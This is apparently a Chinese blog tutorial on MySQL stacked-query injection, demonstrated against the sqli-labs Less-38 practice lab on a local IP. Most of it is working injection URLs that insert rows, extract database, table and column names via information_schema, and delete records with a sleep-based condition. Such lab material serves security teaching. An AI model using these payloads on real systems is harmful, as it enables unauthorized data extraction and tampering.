Mysql注入 -- 堆叠注入


一、堆叠注入介绍

1、多条sql语句同时执行

2、union只能执行查询语句,堆叠可以执行增删改查

3、同时执行三条语句

select 1;select 2;select 3;


二、插入注入

1、找到注入点,添加一条数据

http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(66,'aiyou','bucuo') --+

再次访问http://192.168.139.129/sqli/Less-38/?id=66


2、获取数据库名称

http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(67,database(),'bucuo') --+

再次访问http://192.168.139.129/sqli/Less-38/?id=67获取数据库名称


3、获取数据库中的表名

http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(71,(select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 2,1) ,(select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 3,1)) --+

再次访问http://192.168.139.129/sqli/Less-38/?id=71获取表名信息

图片

4、获取表中的字段名

http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(74,(select column_name from information_schema.columns where table_name="users" limit 13,1) ,(select column_name from information_schema.columns where table_name="users" limit 12,1)) --+

再次访问http://192.168.139.129/sqli/Less-38/?id=74获取字段信息

三、删除删除注入

http://192.168.139.129/sqli/Less-38/?id=1';delete from users where id=74 and sleep(if((select database())=0x7365637572697479,5,0));


禁止非法,后果自负


Windows正版 mak激活密钥

【痛悼】共和国痛失袁隆平院士

获取更多资讯请加入交流群


    协助本站SEO优化一下,谢谢!
    关键词不能为空
评 论
更换验证码